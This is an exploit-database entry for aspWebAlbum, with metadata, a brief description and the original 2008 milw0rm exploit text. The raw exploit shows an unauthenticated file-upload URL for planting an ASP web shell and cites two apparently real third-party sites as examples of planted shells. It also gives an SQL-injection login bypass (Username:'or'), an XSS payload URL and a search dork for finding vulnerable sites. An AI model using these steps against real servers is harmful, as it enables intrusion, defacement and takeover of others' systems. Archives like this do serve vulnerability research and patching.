Arbitrary File Upload Exploit [AspWebAlbum All Versions]

vendor:

aspWebAlbum

by:

Alemin_Krali

8.8

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: aspWebAlbum

Affected Version From: All Versions

Affected Version To: All Versions

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Arbitrary File Upload Exploit [AspWebAlbum All Versions]

This exploit allows an attacker to upload arbitrary files to the vulnerable server. The vulnerability exists in the album.asp page, which allows an attacker to upload a file with the action parameter set to 'upload'. This allows an attacker to upload malicious files to the server, which can then be used to gain access to the server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of the software.

Source

Exploit-DB raw data:

#################################################################################################
                                                                                                #
#-#  Discovered by Alemin_Krali                                                                 #
                                                                                                #
#-#  aspWebAlbum 3.2                                                                            #
                                                                                                #
#-#  Script Download "http://www.fullrevolution.com"                                            #
                                                                                                #
#-#  aspWebAlbum 3.2 Single Site License  |  $60.00 : )                                         #
                                                                                                #
#-#  HomePage  al3m.blogspot.com                                                                #
                                                                                                #
#-#  alemin@windowslive.com                                                                     #
                                                                                                #
#-#  Dork ? : album.asp?pic= .jpg cat=                                                          #
                                                                                                #
                                                                                                #
                                                                                                #
            #--#  1-Arbitrary File Upload Exploit [AspWebAlbum All Versions]                    #
                                                                                                #
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name!                   #
                                                                                                #
and your shell adress:                                                                          #
                                                                                                #
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp                #
                                                                                                #
                                                                                                #
ex:1                                                                                            #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp          #
                                                                                                #
ex:2                                                                                            #
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/                #
Ablaze rally 9-24-06/pics/klasvayv.asp                                                          #
                                                                                                #
                                                                                                #
           #--#  2-Admin Bypass     [AspWebAlbum 3.2]                                           #
                                                                                                #
                                                                                                #
http://site.com/path/album.asp?action=login                                                     #
                                                                                                #
ASP/MS SQL Server login syntax                                                                  #
                                                                                                #
Username:'or'                                                                                   #
Password:anything                                                                               #
                                                                                                #
                                                                                                #
           #--# 3-Xss Vulnerability  [AspWebAlbum 3.2]                                          #
                                                                                                #
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
                                                                                                #
##################################################################################################

# milw0rm.com [2008-09-10]